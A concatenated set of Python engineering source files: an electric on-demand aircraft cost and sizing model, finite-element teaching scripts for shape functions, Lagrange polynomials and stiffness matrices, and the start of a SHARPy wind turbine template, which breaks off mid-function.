constraints += [cost_per_mission >= sum(c.cost_per_mission for c in expenses)]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class VehicleAcquisitionCost(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
purchase_price = aircraft.purchase_price
vehicle_life = aircraft.vehicle_life
cost_per_time = Variable("cost_per_time","hr**-1",
"Amortized vehicle purchase price per unit mission time")
cost_per_mission = Variable("cost_per_mission","-",
"Amortized vehicle acquisition cost per mission")
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_time == purchase_price/vehicle_life]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class AvionicsAcquisitionCost(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
purchase_price = aircraft.avionics.purchase_price
vehicle_life = aircraft.vehicle_life
cost_per_time = Variable("cost_per_time","hr**-1",
"Amortized avionics purchase price per unit mission time")
cost_per_mission = Variable("cost_per_mission","-",
"Amortized avionics acquisition cost per mission")
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_time == purchase_price/vehicle_life]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class BatteryAcquisitionCost(Model):
def setup(self,battery,mission):
t_mission = mission.t_mission
purchase_price = battery.purchase_price
cycle_life = battery.cycle_life
cost_per_time = Variable("cost_per_time","hr**-1",
"Amortized battery purchase price per unit mission time")
cost_per_mission = Variable("cost_per_mission","-",
"Amortized battery cost per mission")
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_mission == purchase_price/cycle_life]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class CapitalExpenses(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_time = Variable("cost_per_time","hr**-1","Capital expenses per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Capital expenses per mission")
vehicle_cost = VehicleAcquisitionCost(aircraft,mission)
avionics_cost = AvionicsAcquisitionCost(aircraft,mission)
battery_cost = BatteryAcquisitionCost(aircraft.battery,mission)
self.costs = [vehicle_cost, avionics_cost, battery_cost]
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
self.vehicle_cost = vehicle_cost
self.avionics_cost = avionics_cost
self.battery_cost = battery_cost
constraints = []
constraints += [self.costs]
constraints += [cost_per_mission >= sum(c.cost_per_mission for c in self.costs)]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class PilotCost(Model):
def setup(self,mission):
t_mission = mission.t_mission
wrap_rate = Variable("wrap_rate","hr**-1",
"Cost per pilot, per unit mission time (including benefits and overhead)")
cost_per_time = Variable("cost_per_time","hr**-1","Pilot cost per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Pilot cost per mission")
self.wrap_rate = wrap_rate
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
if mission.mission_type == "autonomous":
aircraft_per_bunker_pilot = Variable("aircraft_per_bunker_pilot",8,"-",
"Number of aircraft controlled by 1 bunker pilot (assuming no crew on board)")
constraints += [cost_per_time == wrap_rate/aircraft_per_bunker_pilot]
if mission.mission_type == "piloted":
pilots_per_aircraft = Variable("pilots_per_aircraft",1.5,"-",
"Pilots per aircraft (assuming crew on board)")
constraints += [cost_per_time == wrap_rate*pilots_per_aircraft]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class MaintenanceCost(Model):
def setup(self,mission):
t_mission = mission.t_mission
MMH_FH = Variable("MMH_FH","-","Maintenance man-hours per flight hour")
wrap_rate = Variable("wrap_rate","hr**-1",
"Cost per mechanic, per unit maintenance time (including benefits and overhead)")
cost_per_time = Variable("cost_per_time","hr**-1","Maintenance cost per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Maintenance cost per mission")
self.MMH_FH = MMH_FH
self.wrap_rate = wrap_rate
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_time == MMH_FH*wrap_rate]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class EnergyCost(Model):
def setup(self,mission):
t_mission = mission.t_mission
E_charger = mission.time_on_ground.E_charger
cost_per_energy = Variable("cost_per_energy",0.12,"kWh**-1","Price of electricity")
cost_per_time = Variable("cost_per_time","hr**-1","Energy cost per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Energy cost per mission")
self.cost_per_energy = cost_per_energy
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_mission == E_charger*cost_per_energy]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class IndirectOperatingCost(Model):
def setup(self,operating_expenses):
IOC_fraction = Variable("IOC_fraction",0.12,"-","IOC as a fraction of DOC")
cost_per_time = Variable("cost_per_time","hr**-1","IOC per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","IOC per mission")
self.IOC_fraction = IOC_fraction
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_mission == IOC_fraction*operating_expenses.DOC]
constraints += [cost_per_time == IOC_fraction*operating_expenses.DOC_per_time]
return constraints
class OperatingExpenses(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_time = Variable("cost_per_time","hr**-1","Operating expenses per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Operating expenses per mission")
DOC = Variable("DOC","-","Direct operating cost per mission")
DOC_per_time = Variable("DOC_per_time","hr**-1","Direct operating cost per unit mission time")
IOC = Variable("IOC","-","Indirect operating cost per mission")
IOC_per_time = Variable("IOC_per_time","hr**-1","Indirect operating cost per unit mission time")
self.DOC = DOC
self.DOC_per_time = DOC_per_time
self.IOC = IOC
self.IOC_per_time = IOC_per_time
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
pilot_cost = PilotCost(mission)
maintenance_cost = MaintenanceCost(mission)
energy_cost = EnergyCost(mission)
indirect_operating_cost = IndirectOperatingCost(self)
self.pilot_cost = pilot_cost
self.maintenance_cost = maintenance_cost
self.energy_cost = energy_cost
self.indirect_operating_cost = indirect_operating_cost
constraints = []
constraints += [pilot_cost, maintenance_cost, energy_cost, indirect_operating_cost]
constraints += [DOC >= pilot_cost.cost_per_mission
+ maintenance_cost.cost_per_mission + energy_cost.cost_per_mission]
constraints += [DOC_per_time == DOC/t_mission]
constraints += [IOC == indirect_operating_cost.cost_per_mission]
constraints += [IOC_per_time == indirect_operating_cost.cost_per_time]
constraints += [cost_per_mission >= DOC + IOC]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
def test():
#String inputs
reserve_type="FAA_heli"
sizing_mission_type="piloted"
revenue_mission_type="piloted"
deadhead_mission_type="autonomous"
problem_subDict = {}
Aircraft = OnDemandAircraft(autonomousEnabled=True)
problem_subDict.update({
Aircraft.L_D_cruise: 14., #estimated L/D in cruise
Aircraft.eta_cruise: 0.85, #propulsive efficiency in cruise
Aircraft.tailRotor_power_fraction_hover: 0.001,
Aircraft.tailRotor_power_fraction_levelFlight: 0.001,
Aircraft.cost_per_weight: 350*ureg.lbf**-1, #vehicle cost per unit empty weight
Aircraft.battery.C_m: 400*ureg.Wh/ureg.kg, #battery energy density
Aircraft.battery.cost_per_C: 400*ureg.kWh**-1, #battery cost per unit energy capacity
Aircraft.rotors.N: 12, #number of propellers
Aircraft.rotors.Cl_mean_max: 1.0, #maximum allowed mean lift coefficient
Aircraft.structure.weight_fraction: 0.55, #empty weight fraction
Aircraft.electricalSystem.eta: 0.9, #electrical system efficiency
})
SizingMission = OnDemandSizingMission(Aircraft,mission_type=sizing_mission_type,
reserve_type=reserve_type)
problem_subDict.update({
SizingMission.mission_range: 87*ureg.nautical_mile,#mission range
SizingMission.V_cruise: 200*ureg.mph,#cruising speed
SizingMission.t_hover: 120*ureg.s,#hover time
SizingMission.T_A: 15.*ureg("lbf")/ureg("ft")**2,#disk loading
SizingMission.passengers.N_passengers: 3,#Number of passengers
})
RevenueMission = OnDemandRevenueMission(Aircraft,mission_type=revenue_mission_type)
problem_subDict.update({
RevenueMission.mission_range: 30*ureg.nautical_mile,#mission range
RevenueMission.V_cruise: 200*ureg.mph,#cruising speed
RevenueMission.t_hover: 30*ureg.s,#hover time
RevenueMission.passengers.N_passengers: 2,#Number of passengers
RevenueMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
DeadheadMission = OnDemandDeadheadMission(Aircraft,mission_type=deadhead_mission_type)
problem_subDict.update({
DeadheadMission.mission_range: 30*ureg.nautical_mile,#mission range
DeadheadMission.V_cruise: 200*ureg.mph,#cruising speed
DeadheadMission.t_hover: 30*ureg.s,#hover time
DeadheadMission.passengers.N_passengers: 0.001,#Number of passengers
DeadheadMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
MissionCost = OnDemandMissionCost(Aircraft,RevenueMission,DeadheadMission)
problem_subDict.update({
MissionCost.revenue_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_ratio: 0.2, #deadhead ratio
})
problem = Model(MissionCost["cost_per_trip"],
[Aircraft, SizingMission, RevenueMission, DeadheadMission, MissionCost])
problem.substitutions.update(problem_subDict)
solution = problem.solve(verbosity=0)
return solution
if __name__=="__main__":
#Concept representative analysis
from noise_models import rotational_noise, vortex_noise, noise_weighting
#String inputs
reserve_type="FAA_heli"
sizing_mission_type="piloted"
revenue_mission_type="piloted"
deadhead_mission_type="autonomous"
problem_subDict = {}
Aircraft = OnDemandAircraft(autonomousEnabled=True)
problem_subDict.update({
Aircraft.L_D_cruise: 14., #estimated L/D in cruise
Aircraft.eta_cruise: 0.85, #propulsive efficiency in cruise
Aircraft.tailRotor_power_fraction_hover: 0.001,
Aircraft.tailRotor_power_fraction_levelFlight: 0.001,
Aircraft.cost_per_weight: 350*ureg.lbf**-1, #vehicle cost per unit empty weight
Aircraft.battery.cost_per_C: 400*ureg.kWh**-1, #battery cost per unit energy capacity
Aircraft.rotors.N: 12, #number of propellers
Aircraft.rotors.Cl_mean_max: 1.0, #maximum allowed mean lift coefficient
Aircraft.battery.C_m: 400*ureg.Wh/ureg.kg, #battery energy density
Aircraft.structure.weight_fraction: 0.55, #empty weight fraction
Aircraft.electricalSystem.eta: 0.9, #electrical system efficiency
})
SizingMission = OnDemandSizingMission(Aircraft,mission_type=sizing_mission_type,
reserve_type=reserve_type)
problem_subDict.update({
SizingMission.mission_range: 87*ureg.nautical_mile,#mission range
SizingMission.V_cruise: 200*ureg.mph,#cruising speed
SizingMission.t_hover: 120*ureg.s,#hover time
SizingMission.T_A: 15.*ureg("lbf")/ureg("ft")**2,#disk loading
SizingMission.passengers.N_passengers: 3,#Number of passengers
})
RevenueMission = OnDemandRevenueMission(Aircraft,mission_type=revenue_mission_type)
problem_subDict.update({
RevenueMission.mission_range: 30*ureg.nautical_mile,#mission range
RevenueMission.V_cruise: 200*ureg.mph,#cruising speed
RevenueMission.t_hover: 30*ureg.s,#hover time
RevenueMission.passengers.N_passengers: 2,#Number of passengers
RevenueMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
DeadheadMission = OnDemandDeadheadMission(Aircraft,mission_type=deadhead_mission_type)
problem_subDict.update({
DeadheadMission.mission_range: 30*ureg.nautical_mile,#mission range
DeadheadMission.V_cruise: 200*ureg.mph,#cruising speed
DeadheadMission.t_hover: 30*ureg.s,#hover time
DeadheadMission.passengers.N_passengers: 0.001,#Number of passengers
DeadheadMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
MissionCost = OnDemandMissionCost(Aircraft,RevenueMission,DeadheadMission)
problem_subDict.update({
MissionCost.revenue_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_ratio: 0.2, #deadhead ratio
})
problem = Model(MissionCost["cost_per_trip"],
[Aircraft, SizingMission, RevenueMission, DeadheadMission, MissionCost])
problem.substitutions.update(problem_subDict)
solution = problem.solve(verbosity=0)
delta_S = 500*ureg.ft
noise_weighting = "A"
B = 5
SPL_dict = {}
missions = ["Sizing","Revenue","Deadhead"]
for mission in missions:
mission_name = "OnDemand" + mission + "Mission"
T_perRotor = solution("T_perRotor_" + mission_name)[0]
R = solution("R")
VT = solution("VT_" + mission_name)[0]
s = solution("s")
Cl_mean = solution("Cl_{mean_{max}}")
N = solution("N")
f_peak, SPL, spectrum = vortex_noise(T_perRotor=T_perRotor,R=R,VT=VT,s=s,
Cl_mean=Cl_mean,N=N,B=B,delta_S=delta_S,h=0*ureg.ft,t_c=0.12,St=0.28,
weighting=noise_weighting)
SPL_dict[mission] = SPL
if (reserve_type == "FAA_aircraft") or (reserve_type == "FAA_heli"):
num = solution("t_{loiter}_OnDemandSizingMission").to(ureg.minute).magnitude
reserve_type_string = " (%0.0f-minute loiter time)" % num
if reserve_type == "Uber":
num = solution("R_{divert}_OnDemandSizingMission").to(ureg.nautical_mile).magnitude
reserve_type_string = " (%0.1f-nmi diversion distance)" % num
print
print "Concept representative analysis"
print
print "Battery energy density: %0.0f Wh/kg" \
% solution("C_m_OnDemandAircraft/Battery").to(ureg.Wh/ureg.kg).magnitude
print "Empty weight fraction: %0.4f" \
% solution("weight_fraction_OnDemandAircraft/Structure")
print "Cruise lift-to-drag ratio: %0.1f" \
% solution("L_D_cruise_OnDemandAircraft")
print "Hover disk loading: %0.1f lbf/ft^2" \
% solution("T/A_OnDemandSizingMission").to(ureg("lbf/ft**2")).magnitude
print "Rotor maximum mean lift coefficient: %0.2f" \
% solution("Cl_{mean_{max}}_OnDemandAircraft/Rotors")
print "Cruise propulsive efficiency: %0.2f" \
% solution("\eta_{cruise}_OnDemandAircraft")
print "Electrical system efficiency: %0.2f" \
% solution("\eta_OnDemandAircraft/ElectricalSystem")
print "Observer distance: %0.0f ft" % delta_S.to(ureg.ft).magnitude
print "Noise weighting type: %s" % noise_weighting
print
print "Sizing Mission (%s)" % sizing_mission_type
print "Mission range: %0.0f nmi" % \
solution("mission_range_OnDemandSizingMission").to(ureg.nautical_mile).magnitude
print "Number of passengers: %0.1f" % \
solution("N_{passengers}_OnDemandSizingMission/Passengers")
print "Reserve type: " + reserve_type + reserve_type_string
print "Vehicle weight during mission: %0.0f lbf" % \
solution("W_{mission}_OnDemandSizingMission").to(ureg.lbf).magnitude
print "SPL in hover: %0.1f dB" % SPL_dict["Sizing"]
print
print "Revenue-Generating Mission (%s)" % revenue_mission_type
print "Mission range: %0.0f nmi" % \
solution("mission_range_OnDemandRevenueMission").to(ureg.nautical_mile).magnitude
print "Number of passengers: %0.1f" % \
solution("N_{passengers}_OnDemandRevenueMission/Passengers")
print "Vehicle weight during mission: %0.0f lbf" % \
solution("W_{mission}_OnDemandRevenueMission").to(ureg.lbf).magnitude
print "Total time: %0.1f minutes" % \
solution("t_{mission}_OnDemandRevenueMission").to(ureg.minute).magnitude
print "Flight time: %0.1f minutes" % \
solution("t_{flight}_OnDemandRevenueMission").to(ureg.minute).magnitude
print "Time on ground: %0.1f minutes" % \
solution("t_OnDemandRevenueMission/TimeOnGround").to(ureg.minute).magnitude
print "SPL in hover: %0.1f dB" % SPL_dict["Revenue"]
print
print "Deadhead Mission (%s)" % deadhead_mission_type
print "Mission range: %0.0f nmi" % \
solution("mission_range_OnDemandDeadheadMission").to(ureg.nautical_mile).magnitude
print "Number of passengers: %0.1f" % \
solution("N_{passengers}_OnDemandDeadheadMission/Passengers")
print "Vehicle weight during mission: %0.0f lbf" % \
solution("W_{mission}_OnDemandDeadheadMission").to(ureg.lbf).magnitude
print "Total time: %0.1f minutes" % \
solution("t_{mission}_OnDemandDeadheadMission").to(ureg.minute).magnitude
print "Flight time: %0.1f minutes" % \
solution("t_{flight}_OnDemandDeadheadMission").to(ureg.minute).magnitude
print "Time on ground: %0.1f minutes" % \
solution("t_OnDemandDeadheadMission/TimeOnGround").to(ureg.minute).magnitude
print "SPL in hover: %0.1f dB" % SPL_dict["Deadhead"]
print
print "Takeoff gross weight: %0.0f lbs" % \
solution("TOGW_OnDemandAircraft").to(ureg.lbf).magnitude
print "Empty weight: %0.0f lbs" % \
solution("W_OnDemandAircraft/Structure").to(ureg.lbf).magnitude
print "Battery weight: %0.0f lbs" % \
solution("W_OnDemandAircraft/Battery").to(ureg.lbf).magnitude
print "Vehicle purchase price: $%0.0f " % \
solution("purchase_price_OnDemandAircraft")
print "Avionics purchase price: $%0.0f " % \
solution("purchase_price_OnDemandAircraft/Avionics")
print "Battery purchase price: $%0.0f " % \
solution("purchase_price_OnDemandAircraft/Battery")
print
print "Cost per trip: $%0.2f" % \
solution("cost_per_trip_OnDemandMissionCost")
print "Cost per trip, per passenger: $%0.2f" % \
solution("cost_per_trip_per_passenger_OnDemandMissionCost")
print "Cost per trip, per seat mile: $%0.2f per mile" % \
solution("cost_per_seat_mile_OnDemandMissionCost").to(ureg.mile**-1).magnitude
print "Cost from revenue-generating flight: $%0.2f" % \
solution("revenue_cost_per_trip_OnDemandMissionCost")
print "Cost from deadhead flight: $%0.2f" % \
solution("deadhead_cost_per_trip_OnDemandMissionCost")
print
print "Cost Breakdown from Revenue-Generating Flight Only (no deadhead)"
print
print "Vehicle capital expenses, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses")
print "Amortized vehicle acquisition cost, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses/VehicleAcquisitionCost")
print "Amortized avionics acquisition cost, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses/AvionicsAcquisitionCost")
print "Amortized battery acquisition cost, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses/BatteryAcquisitionCost")
print
print "Vehicle operating expenses, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses")
print "Direct operating cost, per trip: $%0.2f" % \
solution("DOC_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses")
print "Indirect operating cost, per trip: $%0.2f" % \
solution("IOC_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses")
print
print "Pilot cost, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses/PilotCost")
print "Amortized maintenance cost, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses/MaintenanceCost")
print "Energy cost, per trip: $%0.2f" % \
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses/EnergyCost")
#print solution.summary()
``` |
{
"source": "jomorlier/FEM-Notes",
"score": 2
} |
#### File: img_src/TheFEM/Four_nodes_shape_func.py
```python
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import rcParams
#import seaborn
rcParams['font.family'] = 'serif'
rcParams['font.size'] = 14
plt.close("all")
def make_plot(x, y, N):
x_cords = [-1, 1, 1, -1]
y_cords = [-1, -1, 1, 1]
fig = plt.figure(figsize=(8, 5))
ax = fig.add_subplot(111, projection='3d')
ax.plot([-1, 1, 1, -1, -1], [-1, -1, 1, 1, -1], "-ko", zorder=-10)
ax.plot([x_cords[cont-1], x_cords[cont-1]],
[y_cords[cont-1], y_cords[cont-1]], [0, 1], "--k", zorder=-10)
ax.plot_surface(x, y, N, cstride=1, rstride=1, cmap="YlGnBu_r",
alpha=0.6, lw=0.5, zorder=3)
ax.view_init(azim=-60, elev=30)
ax.set_xlabel(r"$x$", fontsize=18)
ax.set_ylabel(r"$y$", fontsize=18)
ax.set_zlabel(r"$N^%i(x, y)$"%cont, fontsize=18)
ax.set_xlim(-1, 1)
ax.set_ylim(-1, 1)
ax.set_zlim(0, 1)
plt.savefig("../../img/TheFEM/shape_func-4-nodes-%i.pdf"%cont,
bbox_inches="tight", pad_inches=0.1, transparent=True)
x, y = np.mgrid[-1:1:21j, -1:1:21j]
N1 = 0.25*(1 - x)*(1 - y)
N2 = 0.25*(1 + x)*(1 - y)
N3 = 0.25*(1 + x)*(1 + y)
N4 = 0.25*(1 - x)*(1 + y)
cont = 0
for N in [N1, N2, N3, N4]:
cont = cont + 1
make_plot(x, y, N)
plt.show()
```
#### File: FEM-Notes/scripts/lagrange.py
```python
from __future__ import division
from sympy import *
#
def LagrangPoly(x,order,i,xi=None):
r"""Compute interpolant Lagrange Polynomials
.. math::
l_j(x)=\prod_{\substack{0<m\leq k\\ m\neq j}} \frac{x - x_m}{x_j - x_m}
Parameters
----------
x : Sympy symbol
Variable for the interpolation.
order : int
Order of the polynomials.
i : int
Number of the polynomial according to `xi`.
xi : (order + 1) list of float
Position for the nodes.
Returns
-------
poly : Sympy expression
Interpolant polynomial for the `i`-th node in `xi`.
Examples
--------
>>> from lagrange import LagrangPoly as la_poly
>>> x = symbols('x')
>>> pol0 = simplify(la_poly(x, 2, 0, [-1,1,0]))
>>> pol1 = simplify(la_poly(x, 2, 1, [-1,1,0]))
>>> pol2 = simplify(la_poly(x, 2, 2, [-1,1,0]))
>>> print(pol0)
x*(x - 1)/2
>>> print(pol1)
x*(x + 1)/2
"""
if xi==None:
xi = symbols('x:%d'%(order + 1)) # No entiendo esta condicion
index = range(order + 1)
index.pop(i)
poly = prod([(x - xi[j])/(xi[i] - xi[j]) for j in index])
return poly
# Run examples as tests
if __name__=="__main__":
import doctest
doctest.testmod()
```
#### File: scripts/SPRINGS/femutil.py
```python
import numpy as np
def uel(k):
"""Return stiffness matrix for a spring with constant `k`"""
kl = np.zeros([2,2], dtype=float)
kl[0, 0] = k
kl[0, 1] = -k
kl[1, 0] = k
kl[1, 1] = k
return kl
```
#### File: FEM-Notes/src/stiff_4nodes.py
```python
from __future__ import division, print_function
from sympy import *
def umat(nu, E):
"""2D Elasticity constitutive matrix"""
C = zeros(3, 3)
G = E/(1 - nu**2)
mnu = (1 - nu)/2.0
C[0, 0] = G
C[0, 1] = nu*G
C[1, 0] = C[0, 1]
C[1, 1] = G
C[2, 2] = G*mnu
return C
def stdm4(x, y):
"""Four noded element strain-displacement matrix"""
N = zeros(4)
B = zeros(3, 8)
N = S(1)/4*Matrix([
(1 - x)*(1 - y),
(1 + x)*(1 - y),
(1 + x)*(1 + y),
(1 - x)*(1 + y)])
dhdx=zeros(2, 4)
for i in range(4):
dhdx[0,i]=diff(N[i], x)
dhdx[1,i]=diff(N[i], y)
for i in range(4):
B[0, 2*i] = dhdx[0, i]
B[1, 2*i+1] = dhdx[1, i]
B[2, 2*i] = dhdx[1, i]
B[2, 2*i+1] = dhdx[0, i]
return B
# Assign symbols
x, y = symbols('x y')
nu, E = symbols('nu E')
h = symbols('h')
K = zeros(8, 8)
# Symbolically compute matrices
C = umat(nu, E)
B = stdm4(x, y)
K_int = B.T * C * B
# Integrate final stiffness
for i in range(8):
for j in range(8):
K[i,j] = integrate(K_int[i,j], (x,-h,h), (y,-h,h))
knum = K.subs([(E, S(1)), (nu, S(1)/3.0), (h, S(2))])
print(knum)
``` |
{
"source": "jomorlier/sharpy-1",
"score": 3
} |
#### File: cases/templates/template_wt.py
```python
import sharpy.utils.generate_cases as gc
import pandas as pd
import numpy as np
import scipy.interpolate as scint
import math
import os
import sharpy.utils.algebra as algebra
import sharpy.utils.h5utils as h5
deg2rad = np.pi/180.
######################################################################
# AUX FUNCTIONS
######################################################################
def create_node_radial_pos_from_elem_centres(root_elem_centres_tip, num_node, num_elem, num_node_elem):
"""
create_node_radial_pos_from_elem_centres
Define the position of the nodes adn the elements in the blade from the list of element centres
Args:
root_elem_centres_tip (np.array):
- First value: Radial position of the beginning of the blade
- Last value: Radial position of the tip of the blade
- Rest of the values: Radial position the rest of the strucutral element centres
num_node (int): number of nodes
num_elem (int): number of elements
num_node_elem (int): number of nodes in each element
Returns:
node_r (np.array): Radial position of the nodes
elem_r (np.array): Radial position of the elements
Notes:
Radial positions are measured from the hub centre and measured in the rotation plane
"""
elem_r = root_elem_centres_tip[1:-1]
node_r = np.zeros((num_node, ), )
node_r[0] = root_elem_centres_tip[0]
node_r[-2] = root_elem_centres_tip[-2]
node_r[-1] = root_elem_centres_tip[-1]
for ielem in range(num_elem-1):
node_r[ielem*(num_node_elem-1)+1] = elem_r[ielem]
node_r[ielem*(num_node_elem-1)+2] = 0.5*(elem_r[ielem]+elem_r[ielem+1])
return node_r, elem_r
def create_blade_coordinates(num_node, node_r, node_y, node_z):
"""
create_blade_coordinates
Creates SHARPy format of the nodes coordinates and
applies prebending and presweept to node radial position
Args:
num_node (int): number of nodes
node_r (np.array): Radial position of the nodes
node_y (np.array): Displacement of each point IN the rotation plane
node_z (np.array): Displacement of each point OUT OF the rotation plane
Returns:
coordinates (np.array): nodes coordinates
"""
coordinates = np.zeros((num_node,3),)
coordinates[:,0] = node_r
coordinates[:,1] = node_y
coordinates[:,2] = node_z
return coordinates
######################################################################
# FROM EXCEL TYPE 01
######################################################################
def generate_from_excel_type01(chord_panels,
rotation_velocity,
pitch,
excel_file_name= 'database_type01.xlsx',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_coord = 'airfoil_coord',
excel_sheet_rotor = 'rotor_parameters',
excel_sheet_structural_tower = 'structural_tower',
excel_sheet_nacelle = 'structural_nacelle',
m_distribution = 'uniform',
n_points_camber = 100,
tol_remove_points = 1e-3):
"""
generate_wt_from_excel_type01
Function needed to generate a wind turbine from an excel database of type 01 (FAST format)
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch (float): pitch angle in degrees
excel_file_name (str):
excel_sheet_structural_blade (str):
excel_sheet_aero_blade (str):
excel_sheet_airfoil_coord (str):
excel_sheet_rotor (str):
excel_sheet_structural_tower (str):
excel_sheet_nacelle (str):
m_distribution (str):
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
wt (sharpy.utils.generate_cases.AeroelasticInfromation): Aeroelastic infrmation of the wind turbine
LC (list): list of all the Lagrange constraints needed in the cases (sharpy.utils.generate_cases.LagrangeConstraint)
MB (list): list of the multibody information of each body (sharpy.utils.generate_cases.BodyInfrmation)
"""
######################################################################
## BLADE
######################################################################
blade = gc.AeroelasticInformation()
######################################################################
### STRUCTURE
######################################################################
# Read blade structural information from excel file
Radius = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'Radius')
BlFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BlFract')
AeroCent= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'AeroCent')
# TODO: implement aerocent
print("WARNING: AeroCent not implemented")
StrcTwst= (gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'StrcTwst') + pitch)*deg2rad
BMassDen= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BMassDen')
FlpStff= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpStff')
EdgStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgStff')
GJStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'GJStff')
EAStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EAStff')
Alpha = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'Alpha')
FlpIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpIner')
EdgIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgIner')
PrecrvRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PrecrvRef')
PreswpRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PreswpRef')
FlpcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpcgOf')
EdgcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgcgOf')
FlpEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpEAOf')
EdgEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgEAOf')
# Base parameters
blade.StructuralInformation.num_elem = len(Radius) - 2
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
# Geometry
